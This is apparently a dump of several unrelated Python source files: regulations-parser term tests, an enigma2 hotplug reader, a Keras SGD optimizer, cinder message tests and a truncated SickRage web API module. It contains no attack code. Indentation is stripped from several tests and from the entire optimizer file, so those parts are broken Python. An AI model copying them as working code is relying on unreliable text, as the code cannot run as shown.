            Node(label=['111', 'Subpart'], node_type=Node.EMPTYPART, children=[
                Node(label=['111', '1'], children=[
                    Node(label=['111', '1', 'a']),
                    Node(label=['111', '1', 'b']),
                    Node(label=['111', '1', 'c'])]),
                Node(label=['111', '2'], children=[
                    Node(label=['111', '2', 'p1'], node_type=Node.EXTRACT,
                         children=[Node(label=['111', '2', 'p1', 'p1'])])
                ])]),
            Node(label=['111', 'A'], node_type=Node.APPENDIX, children=[
                Node(label=['111', 'A', '1'], node_type=Node.APPENDIX)])])
        t.look_for_defs(root)
        self.assertItemsEqual(
            t.scoped_terms['EXCLUDED'],
            # note the absence of APPENDIX, and anything below an EXTRACT
            ['111', '111-Subpart', '111-1', '111-1-a', '111-1-b', '111-1-c',
             '111-2'])
    def test_excluded_offsets(self):
        # excluded_offsets reports (start, end) spans for every definition
        # that lives in the node being annotated.
        t = Terms(None)
        t.scoped_terms['_'] = [
            Ref('term', 'lablab', 4), Ref('other', 'lablab', 8),
            Ref('more', 'nonnon', 1)
        ]
        self.assertEqual(
            [(4, 8), (8, 13)],
            t.excluded_offsets(Node('Some text', label=['lablab'])))
        self.assertEqual(
            [(1, 5)],
            t.excluded_offsets(Node('Other', label=['nonnon'])))
        self.assertEqual(
            [],
            t.excluded_offsets(Node('Ab ab ab', label=['ababab'])))
    def test_excluded_offsets_blacklist(self):
        # A global ('ALL') ignore phrase masks the matching span.
        t = Terms(None)
        t.scoped_terms['_'] = [Ref('bourgeois', '12-Q-2', 0)]
        settings.IGNORE_DEFINITIONS_IN['ALL'] = ['bourgeois pig']
        excluded = t.excluded_offsets(Node('You are a bourgeois pig!',
                                           label=['12', '3']))
        self.assertEqual([(10, 23)], excluded)
    def test_excluded_offsets_blacklist_per_reg(self):
        # Ignore phrases can also be keyed by CFR part ('12' here).
        t = Terms(None)
        t.scoped_terms['_'] = [
            Ref('bourgeois', '12-Q-2', 0),
            Ref('consumer', '12-Q-3', 0)]
        settings.IGNORE_DEFINITIONS_IN['ALL'] = ['bourgeois pig']
        settings.IGNORE_DEFINITIONS_IN['12'] = ['consumer price index']
        excluded = t.excluded_offsets(
            Node('There is a consumer price index', label=['12', '2']))
        self.assertEqual([(11, 31)], excluded)
    def test_excluded_offsets_blacklist_word_boundaries(self):
        """If an exclusion begins/ends with word characters, the searching
        regex should make sure to only match on word boundaries"""
        settings.IGNORE_DEFINITIONS_IN['ALL'] = ['shed act', '(phrase)']
        t = Terms(None)
        t.scoped_terms['_'] = [Ref('act', '28-6-d', 0)]
        # 'watershed act' must NOT match the 'shed act' exclusion mid-word.
        excluded = t.excluded_offsets(Node("That's a watershed act",
                                           label=['28', '9']))
        self.assertEqual([], excluded)
        # Non-word-delimited exclusions like '(phrase)' still match.
        excluded = t.excluded_offsets(Node("This has a '(phrase)' in it",
                                           label=['28', '9']))
        self.assertNotEqual([], excluded)
def test_calculate_offsets(self):
applicable_terms = [('rock band', 'a'), ('band', 'b'), ('drum', 'c'),
('other thing', 'd')]
text = "I am in a rock band. That's a band with a drum, a rock drum."
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertItemsEqual(matches, [
('rock band', 'a', [(10, 19)]),
('band', 'b', [(30, 34)]),
('drum', 'c', [(42, 46), (55, 59)])])
def test_calculate_offsets_pluralized1(self):
applicable_terms = [('rock band', 'a'), ('band', 'b'), ('drum', 'c'),
('other thing', 'd')]
text = "I am in a rock band. That's a band with a drum, a rock drum."
text += " Many bands. "
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertItemsEqual(matches, [
('rock band', 'a', [(10, 19)]),
('band', 'b', [(30, 34)]),
('bands', 'b', [(66, 71)]),
('drum', 'c', [(42, 46), (55, 59)])])
def test_calculate_offsets_pluralized2(self):
applicable_terms = [('activity', 'a'), ('other thing', 'd')]
text = "activity, activities."
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertEqual(2, len(matches))
def test_calculate_offsets_singularized(self):
applicable_terms = [('activities', 'a'), ('other thing', 'd')]
text = "activity, activities."
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertEqual(2, len(matches))
def test_calculate_offsets_lexical_container(self):
applicable_terms = [('access device', 'a'), ('device', 'd')]
text = "This access device is fantastic!"
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertEqual(1, len(matches))
_, ref, offsets = matches[0]
self.assertEqual('a', ref)
self.assertEqual([(5, 18)], offsets)
def test_calculate_offsets_overlap(self):
applicable_terms = [('mad cow disease', 'mc'), ('goes mad', 'gm')]
text = 'There goes mad cow disease'
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertEqual(1, len(matches))
_, ref, offsets = matches[0]
self.assertEqual('mc', ref)
self.assertEqual('mad cow disease', text[offsets[0][0]:offsets[0][1]])
def test_calculate_offsets_word_part(self):
"""If a defined term is part of another word, don't include it"""
applicable_terms = [('act', 'a')]
text = "I am about to act on this transaction."
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertEqual(1, len(matches))
self.assertEqual(1, len(matches[0][2]))
def test_calculate_offsets_exclusions(self):
applicable_terms = [('act', 'a')]
text = "This text defines the 'fudge act'"
t = Terms(None)
self.assertEqual(
[], t.calculate_offsets(text, applicable_terms, [(23, 32)]))
self.assertEqual(
[('act', 'a', [(29, 32)])],
t.calculate_offsets(text, applicable_terms, [(1, 5)]))
    def test_process(self):
        """The process() method should both find terms in the requested node
        and order them by term name"""
        # Tree of definition targets; each Ref below points at one of them
        t = Terms(Node(children=[
            Node("ABC5", children=[Node("child")], label=['ref1']),
            Node("AABBCC5", label=['ref2']),
            Node("ABC3", label=['ref3']),
            Node("AAA3", label=['ref4']),
            Node("ABCABC3", label=['ref5']),
            Node("ABCOTHER", label=['ref6']),
            Node("ZZZOTHER", label=['ref7']),
        ]))
        # Scopes map label tuples to the Refs defined within that scope;
        # the queried node (…-ii) should only see the first two scopes
        t.scoped_terms = {
            ("101", "22", "b", "2", "ii"): [
                Ref("abc", "ref1", 1),
                Ref("aabbcc", "ref2", 2)],
            ("101", "22", "b"): [
                Ref("abc", "ref3", 3),
                Ref("aaa", "ref4", 4),
                Ref("abcabc", "ref5", 5)],
            ("101", "22", "b", "2", "iii"): [
                Ref("abc", "ref6", 6),
                Ref("zzz", "ref7", 7)]}
        # Check that the return value is correct
        layer_el = t.process(Node(
            "This has abc, aabbcc, aaa, abcabc, and zzz",
            label=["101", "22", "b", "2", "ii"]))
        # zzz is out of scope; results come back sorted by term name
        self.assertEqual(
            [el['ref'] for el in layer_el],
            ['aaa:ref4', 'aabbcc:ref2', 'abc:ref1', 'abcabc:ref5'])
def test_process_label_in_node(self):
"""Make sure we don't highlight definitions that are being defined
in this paragraph."""
tree = Node(children=[
Node("Defining secret phrase.", label=['AB', 'a']),
Node("Has secret phrase. Then some other content",
label=['AB', 'b'])
], label=['AB'])
t = Terms(tree)
t.scoped_terms = {
('AB',): [Ref("secret phrase", "AB-a", 9)]
}
# Term is defined in the first child
self.assertEqual([], t.process(tree.children[0]))
self.assertEqual(1, len(t.process(tree.children[1])))
| cmc333333/regulations-parser | tests/layer_terms_tests.py | Python | cc0-1.0 | 20,193 |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import Components.Netlink
import enigma
import os
class NetlinkReader():
	"""Reads kernel uevents from a netlink socket and dispatches them.

	Input-device add/remove events are forwarded to enigma; network
	events are handed to the Network component's hotplug handler.
	"""

	def __init__(self):
		from twisted.internet import reactor
		self.nls = Components.Netlink.NetlinkSocket()
		# register with twisted so doRead() fires when data arrives
		reactor.addReader(self)

	def fileno(self):
		"""File descriptor twisted polls on."""
		return self.nls.fileno()

	def doRead(self):
		"""Parse all pending uevents and dispatch them by subsystem."""
		for uevent in self.nls.parse():
			try:
				subsystem = uevent['SUBSYSTEM']
				if subsystem == 'input':
					devname = uevent['DEVNAME']
					action = uevent['ACTION']
					if action == 'add':
						print("New input device detected:", devname)
						enigma.addInputDevice(os.path.join('/dev', devname))
					elif action == 'remove':
						print("Removed input device:", devname)
						enigma.removeInputDevice(os.path.join('/dev', devname))
				elif subsystem == 'net':
					from Components.Network import iNetwork
					iNetwork.hotplug(uevent)
			except KeyError:
				# events missing the keys we need are ignored
				pass

	def connectionLost(self, failure):
		# twisted notifies us here; just log and close the socket
		print("connectionLost?", failure)
		self.nls.close()

	def logPrefix(self):
		return 'NetlinkReader'
reader = NetlinkReader()
| atvcaptain/enigma2 | lib/python/Components/InputHotplug.py | Python | gpl-2.0 | 1,149 |
"""Kerasのoptimizer関連。"""
# pylint: disable=no-name-in-module,attribute-defined-outside-init,invalid-unary-operand-type
import tensorflow as tf
K = tf.keras.backend
@tf.keras.utils.register_keras_serializable(package="pytoolkit")
class SGDEx(tf.keras.optimizers.SGD):
"""重み別に学習率の係数を設定できるSGD。
lr_multipliersは、Layerまたは各weightのnameをキーとし、学習率の係数を値としたdict。
例::
lr_multipliers = {basenet: 0.1}
"""
def __init__(
self,
learning_rate,
lr_multipliers=None,
momentum=0.9,
decay=0.0,
nesterov=True,
lr=None, # deprecated
**kwargs,
):
assert lr is None
super().__init__(
learning_rate=learning_rate,
momentum=momentum,
decay=decay,
nesterov=nesterov,
**kwargs,
)
# {レイヤー: multiplier} or {重みの名前: multiplier}
# model.save()時に前者はそのまま保存できないので、後者に統一する。
self.lr_multipliers = {}
for layer_or_weights_name, mp in (lr_multipliers or {}).items():
if isinstance(layer_or_weights_name, str):
self.lr_multipliers[layer_or_weights_name] = mp
else:
for w in layer_or_weights_name.trainable_weights:
self.lr_multipliers[w.name] = mp
def _resource_apply_dense(self, grad, var, apply_state=None):
# pylint: disable=no-name-in-module,import-error
from tensorflow.python.training import training_ops
var_device, var_dtype = var.device, var.dtype.base_dtype
coefficients = (apply_state or {}).get(
(var_device, var_dtype)
) or self._fallback_apply_state(var_device, var_dtype)
if var.name in self.lr_multipliers:
lr_t = coefficients["lr_t"] * self.lr_multipliers[var.name]
else:
lr_t = coefficients["lr_t"]
if self._momentum:
momentum_var = self.get_slot(var, "momentum")
return training_ops.resource_apply_keras_momentum(
var.handle,
momentum_var.handle,
lr_t,
grad,
coefficients["momentum"],
use_locking=self._use_locking,
use_nesterov=self.nesterov,
)
else:
return training_ops.resource_apply_gradient_descent(
var.handle, lr_t, grad, use_locking=self._use_locking
)
def get_config(self):
config = {"lr_multipliers": self.lr_multipliers}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
| ak110/pytoolkit | pytoolkit/optimizers.py | Python | mit | 2,799 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from cinder.message import defined_messages
from cinder import test
CONF = cfg.CONF
class DefinedMessagesTest(test.TestCase):
    """Sanity checks over the statically defined user-message event ids."""

    @staticmethod
    def _public_event_id_values():
        """Collect the value of every public EventIds attribute."""
        return [getattr(defined_messages.EventIds, name)
                for name in dir(defined_messages.EventIds)
                if not name.startswith('_')]

    def test_event_id_formats(self):
        """Assert all cinder event ids start with VOLUME_."""
        for value in self._public_event_id_values():
            self.assertTrue(value.startswith('VOLUME_'))

    def test_unique_event_ids(self):
        """Assert that no event_id is duplicated."""
        event_ids = self._public_event_id_values()
        self.assertEqual(len(event_ids), len(set(event_ids)))

    def test_event_id_has_message(self):
        """Every event id must map to a non-trivial message."""
        for value in self._public_event_id_values():
            msg = defined_messages.event_id_message_map.get(value)
            self.assertGreater(len(msg), 1)
| Datera/cinder | cinder/tests/unit/message/test_defined_messages.py | Python | apache-2.0 | 1,787 |
# Author: Dennis Lutter <lad1337@gmail.com>
# Author: Jonathon Saine <thezoggy@gmail.com>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import os
import time
import urllib
import datetime
import re
import traceback
import sickbeard
from sickrage.helper.common import dateFormat, dateTimeFormat, timeFormat
from sickrage.helper.encoding import ek
from sickrage.helper.exceptions import CantUpdateShowException, ex, ShowDirectoryNotFoundException
from sickrage.helper.quality import get_quality_string
from sickrage.media.ShowFanArt import ShowFanArt
from sickrage.media.ShowNetworkLogo import ShowNetworkLogo
from sickrage.media.ShowPoster import ShowPoster
from sickrage.media.ShowBanner import ShowBanner
from sickrage.show.ComingEpisodes import ComingEpisodes
from sickrage.show.History import History
from sickrage.show.Show import Show
from sickrage.system.Restart import Restart
from sickrage.system.Shutdown import Shutdown
from versionChecker import CheckVersion
from sickbeard import db, logger, ui, helpers
from sickbeard import search_queue
from sickbeard import image_cache
from sickbeard import classes
from sickbeard import processTV
from sickbeard import network_timezones, sbdatetime
from sickbeard.common import DOWNLOADED
from sickbeard.common import FAILED
from sickbeard.common import IGNORED
from sickbeard.common import Overview
from sickbeard.common import Quality
from sickbeard.common import SKIPPED
from sickbeard.common import SNATCHED
from sickbeard.common import SNATCHED_PROPER
from sickbeard.common import UNAIRED
from sickbeard.common import UNKNOWN
from sickbeard.common import WANTED
from sickbeard.common import ARCHIVED
from sickbeard.common import statusStrings
import codecs
try:
import json
except ImportError:
import simplejson as json
from tornado.web import RequestHandler
indexer_ids = ["indexerid", "tvdbid"]
RESULT_SUCCESS = 10 # only use inside the run methods
RESULT_FAILURE = 20 # only use inside the run methods
RESULT_TIMEOUT = 30 # not used yet :(
RESULT_ERROR = 40 # only use outside of the run methods !
RESULT_FATAL = 50 # only use in Api.default() ! this is the "we encountered an internal error" error
RESULT_DENIED = 60 # only use in Api.default() ! this is the access denied error
result_type_map = {
RESULT_SUCCESS: "success",
RESULT_FAILURE: "failure",
RESULT_TIMEOUT: "timeout",
RESULT_ERROR: "error",
RESULT_FATAL: "fatal",
RESULT_DENIED: "denied",
}
# basically everything except RESULT_SUCCESS / success is bad
class ApiHandler(RequestHandler):
    """ api class that returns json results """
    version = 5 # use an int since float-point is unpredictable

    def __init__(self, *args, **kwargs):
        super(ApiHandler, self).__init__(*args, **kwargs)

    #def set_default_headers(self):
        #self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')

    def get(self, *args, **kwargs):
        """Entry point for every API request.

        Dispatches the requested cmd(s) and writes the response in the
        chosen output format (JSON by default, raw image for media cmds).
        """
        kwargs = self.request.arguments
        # tornado delivers every argument as a list; unwrap single values
        for arg, value in kwargs.iteritems():
            if len(value) == 1:
                kwargs[arg] = value[0]

        args = args[1:]

        # set the output callback
        # default json
        outputCallbackDict = {
            'default': self._out_as_json,
            'image': self._out_as_image,
        }

        accessMsg = u"API :: " + self.request.remote_ip + " - gave correct API KEY. ACCESS GRANTED"
        logger.log(accessMsg, logger.DEBUG)

        # set the original call_dispatcher as the local _call_dispatcher
        _call_dispatcher = self.call_dispatcher
        # if profile was set wrap "_call_dispatcher" in the profile function
        if 'profile' in kwargs:
            from profilehooks import profile

            _call_dispatcher = profile(_call_dispatcher, immediate=True)
            del kwargs["profile"]

        try:
            outDict = _call_dispatcher(args, kwargs)
        except Exception, e: # real internal error oohhh nooo :(
            logger.log(u"API :: " + ex(e), logger.ERROR)
            errorData = {
                "error_msg": ex(e),
                "args": args,
                "kwargs": kwargs
            }
            outDict = _responds(RESULT_FATAL, errorData,
                                "SickRage encountered an internal error! Please report to the Devs")

        if 'outputType' in outDict:
            outputCallback = outputCallbackDict[outDict['outputType']]
        else:
            outputCallback = outputCallbackDict['default']

        # NOTE(review): the bare except silently drops any error from
        # finish() (e.g. the client disconnected); kept as-is.
        try:self.finish(outputCallback(outDict))
        except:pass

    def _out_as_image(self, dict):
        # serve raw media bytes with the media's own content type
        self.set_header('Content-Type', dict['image'].get_media_type())
        return dict['image'].get_media()

    def _out_as_json(self, dict):
        """Serialize the response dict as JSON (optionally JSONP-wrapped)."""
        self.set_header("Content-Type", "application/json;charset=UTF-8")
        try:
            out = json.dumps(dict, ensure_ascii=False, sort_keys=True)
            callback = self.get_query_argument('callback', None) or self.get_query_argument('jsonp', None)
            if callback is not None:
                out = callback + '(' + out + ');' # wrap with JSONP call if requested
        except Exception, e: # if we fail to generate the output fake an error
            logger.log(u"API :: " + traceback.format_exc(), logger.DEBUG)
            out = '{"result": "%s", "message": "error while composing output: %s"}' %\
                  (result_type_map[RESULT_ERROR], ex(e))
        return out

    def call_dispatcher(self, args, kwargs):
        """ calls the appropriate CMD class
            looks for a cmd in args and kwargs
            or calls the TVDBShorthandWrapper when the first args element is a number
            or returns an error that there is no such cmd
        """
        logger.log(u"API :: all args: '" + str(args) + "'", logger.DEBUG)
        logger.log(u"API :: all kwargs: '" + str(kwargs) + "'", logger.DEBUG)

        cmds = None
        if args:
            cmds = args[0]
            args = args[1:]

        if "cmd" in kwargs:
            cmds = kwargs["cmd"]
            del kwargs["cmd"]

        outDict = {}
        if cmds is not None:
            cmds = cmds.split("|")
            multiCmds = bool(len(cmds) > 1)
            for cmd in cmds:
                curArgs, curKwargs = self.filter_params(cmd, args, kwargs)
                cmdIndex = None
                if len(cmd.split("_")) > 1: # was a index used for this cmd ?
                    cmd, cmdIndex = cmd.split("_") # this gives us the clear cmd and the index

                logger.log(u"API :: " + cmd + ": curKwargs " + str(curKwargs), logger.DEBUG)
                if not (multiCmds and cmd in ('show.getbanner', 'show.getfanart', 'show.getnetworklogo', 'show.getposter')): # skip these cmd while chaining
                    try:
                        if cmd in function_mapper:
                            # map function
                            func = function_mapper.get(cmd)
                            # add request handler to function
                            func.rh = self
                            # call function and get response back
                            curOutDict = func(curArgs, curKwargs).run()
                        elif _is_int(cmd):
                            curOutDict = TVDBShorthandWrapper(curArgs, curKwargs, cmd).run()
                        else:
                            curOutDict = _responds(RESULT_ERROR, "No such cmd: '" + cmd + "'")
                    except ApiError, e: # Api errors that we raised, they are harmless
                        curOutDict = _responds(RESULT_ERROR, msg=ex(e))
                else: # if someone chained one of the forbiden cmds they will get an error for this one cmd
                    curOutDict = _responds(RESULT_ERROR, msg="The cmd '" + cmd + "' is not supported while chaining")

                if multiCmds:
                    # note: if multiple same cmds are issued but one has not an index defined it will override all others
                    # or the other way around, this depends on the order of the cmds
                    # this is not a bug
                    if cmdIndex is None: # do we need a index dict for this cmd ?
                        outDict[cmd] = curOutDict
                    else:
                        if not cmd in outDict:
                            outDict[cmd] = {}
                        outDict[cmd][cmdIndex] = curOutDict
                else:
                    outDict = curOutDict

            if multiCmds: # if we had multiple cmds we have to wrap it in a response dict
                outDict = _responds(RESULT_SUCCESS, outDict)
        else: # index / no cmd given
            outDict = CMD_SickBeard(args, kwargs).run()

        return outDict

    def filter_params(self, cmd, args, kwargs):
        """ return only params kwargs that are for cmd
            and rename them to a clean version (remove "<cmd>_")
            args are shared across all cmds

            all args and kwarks are lowerd

            cmd are separated by "|" e.g. &cmd=shows|future
            kwargs are namespaced with "." e.g. show.indexerid=101501
            if a karg has no namespace asing it anyways (global)

            full e.g.
            /api?apikey=1234&cmd=show.seasonlist_asd|show.seasonlist_2&show.seasonlist_asd.indexerid=101501&show.seasonlist_2.indexerid=79488&sort=asc

            two calls of show.seasonlist
            one has the index "asd" the other one "2"
            the "indexerid" kwargs / params have the indexed cmd as a namspace
            and the kwarg / param "sort" is a used as a global
        """
        curArgs = []
        for arg in args:
            curArgs.append(arg.lower())
        curArgs = tuple(curArgs)

        curKwargs = {}
        for kwarg in kwargs:
            if kwarg.find(cmd + ".") == 0:
                cleanKey = kwarg.rpartition(".")[2]
                curKwargs[cleanKey] = kwargs[kwarg].lower()
            elif not "." in kwarg: # the kwarg was not namespaced therefore a "global"
                curKwargs[kwarg] = kwargs[kwarg]
        return curArgs, curKwargs
class ApiCall(ApiHandler):
    """Base class for every API command (CMD_*).

    Subclasses call check_params() in __init__ to declare their
    required/optional parameters, then implement run().
    """
    _help = {"desc": "This command is not documented. Please report this to the developers."}

    def __init__(self, args, kwargs):
        # missing: if check_params recorded any missing required params,
        # run() is swapped for the error response
        try:
            if self._missing:
                self.run = self.return_missing
        except AttributeError:
            pass

        # help: ?help=1 swaps run() for the auto-generated help response
        if 'help' in kwargs:
            self.run = self.return_help

    def run(self):
        # override with real output function in subclass
        return {}

    def return_help(self):
        """Build the help response from _help plus the params declared
        via check_params()."""
        try:
            if self._requiredParams:
                pass
        except AttributeError:
            self._requiredParams = []

        try:
            if self._optionalParams:
                pass
        except AttributeError:
            self._optionalParams = []

        for paramDict, type in [(self._requiredParams, "requiredParameters"),
                                (self._optionalParams, "optionalParameters")]:

            if type in self._help:
                for paramName in paramDict:
                    if not paramName in self._help[type]:
                        self._help[type][paramName] = {}
                    if paramDict[paramName]["allowedValues"]:
                        self._help[type][paramName]["allowedValues"] = paramDict[paramName]["allowedValues"]
                    else:
                        self._help[type][paramName]["allowedValues"] = "see desc"
                    self._help[type][paramName]["defaultValue"] = paramDict[paramName]["defaultValue"]
                    self._help[type][paramName]["type"] = paramDict[paramName]["type"]

            elif paramDict:
                for paramName in paramDict:
                    self._help[type] = {}
                    self._help[type][paramName] = paramDict[paramName]

            else:
                self._help[type] = {}
        msg = "No description available"
        if "desc" in self._help:
            msg = self._help["desc"]
        return _responds(RESULT_SUCCESS, self._help, msg)

    def return_missing(self):
        """Error response listing the required params the caller omitted."""
        if len(self._missing) == 1:
            msg = "The required parameter: '" + self._missing[0] + "' was not set"
        else:
            msg = "The required parameters: '" + "','".join(self._missing) + "' where not set"
        return _responds(RESULT_ERROR, msg=msg)

    def check_params(self, args, kwargs, key, default, required, type, allowedValues):

        # TODO: explain this
        """ function to check passed params for the shorthand wrapper
            and to detect missing/required param

        Consumes one positional arg (or the named kwarg) as the value for
        *key*, validates its type and range, and records it for the help
        output. Returns (value, remaining_args).
        """

        # auto-select indexer
        if key in indexer_ids:
            if "tvdbid" in kwargs:
                key = "tvdbid"

            self.indexer = indexer_ids.index(key)

        missing = True
        orgDefault = default

        if type == "bool":
            allowedValues = [0, 1]

        if args:
            default = args[0]
            missing = False
            args = args[1:]
        if kwargs.get(key):
            default = kwargs.get(key)
            missing = False
        if required:
            # first required param initializes the bookkeeping attributes
            try:
                self._missing
                self._requiredParams.append(key)
            except AttributeError:
                self._missing = []
                self._requiredParams = {key: {"allowedValues": allowedValues,
                                              "defaultValue": orgDefault,
                                              "type": type}}

            if missing and key not in self._missing:
                self._missing.append(key)
        else:
            try:
                self._optionalParams[key] = {"allowedValues": allowedValues,
                                             "defaultValue": orgDefault,
                                             "type": type}
            except AttributeError:
                self._optionalParams = {}
                self._optionalParams[key] = {"allowedValues": allowedValues,
                                             "defaultValue": orgDefault,
                                             "type": type}

        if default:
            default = self._check_param_type(default, key, type)
            if type == "bool":
                type = []
            self._check_param_value(default, key, allowedValues)

        return default, args

    def _check_param_type(self, value, name, type):
        """ checks if value can be converted / parsed to type
            will raise an error on failure
            or will convert it to type and return new converted value
            can check for:
            - int: will be converted into int
            - bool: will be converted to False / True
            - list: will always return a list
            - string: will do nothing for now
            - ignore: will ignore it, just like "string"
        """
        error = False
        if type == "int":
            if _is_int(value):
                value = int(value)
            else:
                error = True
        elif type == "bool":
            if value in ("0", "1"):
                value = bool(int(value))
            elif value in ("true", "True", "TRUE"):
                value = True
            elif value in ("false", "False", "FALSE"):
                value = False
            elif value not in (True, False):
                error = True
        elif type == "list":
            value = value.split("|")
        elif type == "string":
            pass
        elif type == "ignore":
            pass
        else:
            logger.log(u'API :: Invalid param type: "%s" can not be checked. Ignoring it.' % str(type), logger.ERROR)

        if error:
            # this is a real ApiError !!
            raise ApiError(u'param "%s" with given value "%s" could not be parsed into "%s"'
                           % (str(name), str(value), str(type)))

        return value

    def _check_param_value(self, value, name, allowedValues):
        """ will check if value (or all values in it ) are in allowed values
            will raise an exception if value is "out of range"
            if bool(allowedValue) == False a check is not performed and all values are excepted
        """
        if allowedValues:
            error = False
            if isinstance(value, list):
                for item in value:
                    if not item in allowedValues:
                        error = True
            else:
                if not value in allowedValues:
                    error = True

            if error:
                # this is kinda a ApiError but raising an error is the only way of quitting here
                raise ApiError(u"param: '" + str(name) + "' with given value: '" + str(
                    value) + "' is out of allowed range '" + str(allowedValues) + "'")
class TVDBShorthandWrapper(ApiCall):
    _help = {"desc": "This is an internal function wrapper. Call the help command directly for more information."}

    def __init__(self, args, kwargs, sid):
        self.origArgs = args
        self.kwargs = kwargs
        self.sid = sid

        # check_params consumes positional args, so the order (s then e)
        # must match the shorthand URL layout
        self.s, args = self.check_params(args, kwargs, "s", None, False, "ignore", [])
        self.e, args = self.check_params(args, kwargs, "e", None, False, "ignore", [])
        self.args = args

        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ internal function wrapper """
        # prepend the show id and delegate to the most specific command
        full_args = (self.sid,) + self.origArgs
        if self.e:
            return CMD_Episode(full_args, self.kwargs).run()
        if self.s:
            return CMD_ShowSeasons(full_args, self.kwargs).run()
        return CMD_Show(full_args, self.kwargs).run()
# ###############################
# helper functions #
# ###############################
def _sizeof_fmt(num):
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.00:
return "%3.2f %s" % (num, x)
num /= 1024.00
def _is_int(data):
try:
int(data)
except (TypeError, ValueError, OverflowError):
return False
else:
return True
def _rename_element(dict, oldKey, newKey):
try:
dict[newKey] = dict[oldKey]
del dict[oldKey]
except (ValueError, TypeError, NameError):
pass
return dict
def _responds(result_type, data=None, msg=""):
    """
    result is a string of given "type" (success/failure/timeout/error)
    message is a human readable string, can be empty
    data is either a dict or a array, can be a empty dict or empty array
    """
    return {
        "result": result_type_map[result_type],
        "message": msg,
        "data": {} if data is None else data,
    }
def _get_status_Strings(s):
    """Return the human-readable name for an episode status constant."""
    return statusStrings[s]
def _ordinal_to_dateTimeForm(ordinal):
    """Convert an ordinal date to a date-time string ("" if unaired)."""
    # ordinal 1 is the placeholder used for episodes with no airdate
    if int(ordinal) == 1:
        return ""
    return datetime.date.fromordinal(ordinal).strftime(dateTimeFormat)
def _ordinal_to_dateForm(ordinal):
    """Convert an ordinal date to a date string ("" if unaired)."""
    # ordinal 1 is the placeholder used for episodes with no airdate
    if int(ordinal) == 1:
        return ""
    return datetime.date.fromordinal(ordinal).strftime(dateFormat)
def _historyDate_to_dateTimeForm(timeString):
    """Re-format a history timestamp string into dateTimeFormat."""
    parsed = datetime.datetime.strptime(timeString, History.date_format)
    return parsed.strftime(dateTimeFormat)
def _mapQuality(showObj):
    """Split a composite quality value into (initial, archive) name lists."""
    quality_map = _getQualityMap()
    iqualityID, aqualityID = Quality.splitQuality(int(showObj))
    # empty id lists simply produce empty name lists
    anyQualities = [quality_map[quality] for quality in iqualityID]
    bestQualities = [quality_map[quality] for quality in aqualityID]
    return anyQualities, bestQualities
def _getQualityMap():
    """Map Quality constants to the short names exposed by the API."""
    return {Quality.SDTV: 'sdtv',
            Quality.SDDVD: 'sddvd',
            Quality.HDTV: 'hdtv',
            Quality.RAWHDTV: 'rawhdtv',
            Quality.FULLHDTV: 'fullhdtv',
            Quality.HDWEBDL: 'hdwebdl',
            Quality.FULLHDWEBDL: 'fullhdwebdl',
            Quality.HDBLURAY: 'hdbluray',
            Quality.FULLHDBLURAY: 'fullhdbluray',
            Quality.UNKNOWN: 'unknown'}
def _getRootDirs():
    """Return the configured root dirs as a list of info dicts.

    Each entry carries 'valid' (1 if the directory is listable),
    'location' and 'default' (1 for the configured default dir).
    Returns {} when nothing is configured or the stored default index is
    out of range (dict kept for backward compatibility with callers).

    Fixes: removed the dead, never-returned `rootDir` dict; compare the
    default dir by value (==) instead of identity (is); treat a default
    index equal to len(root_dirs) as out of range instead of raising
    IndexError below.
    """
    if sickbeard.ROOT_DIRS == "":
        return {}

    root_dirs = sickbeard.ROOT_DIRS.split('|')
    # the first element of the setting is the index of the default dir
    default_index = int(root_dirs[0])

    # remove default_index value from list (this fixes the offset)
    root_dirs.pop(0)

    if default_index >= len(root_dirs):
        return {}

    # clean up the list - replace %xx escapes by their single-character equivalent
    root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
    default_dir = root_dirs[default_index]

    dir_list = []
    for root_dir in root_dirs:
        valid = 1
        try:
            ek(os.listdir, root_dir)
        except Exception:
            valid = 0
        dir_list.append({
            'valid': valid,
            'location': root_dir,
            'default': 1 if root_dir == default_dir else 0,
        })

    return dir_list
class ApiError(Exception):
    """
    Generic API error

    Raised for malformed/out-of-range parameters; caught in
    call_dispatcher and turned into a RESULT_ERROR response.
    """
class IntParseError(Exception):
    """
    A value could not be parsed into an int, but should be parsable to an int
    """
# -------------------------------------------------------------------------------------#
class CMD_Help(ApiCall):
    _help = {
        "desc": "Get help about a given command",
        "optionalParameters": {
            "subject": {"desc": "The name of the command to get the help of"},
        }
    }

    def __init__(self, args, kwargs):
        # optional: which command to describe (defaults to "help" itself)
        self.subject, args = self.check_params(
            args, kwargs, "subject", "help", False, "string",
            function_mapper.keys())
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get help about a given command """
        if self.subject not in function_mapper:
            return _responds(RESULT_FAILURE, msg="No such cmd")
        # instantiate the target command in help mode and run it
        help_call = function_mapper.get(self.subject)((), {"help": 1})
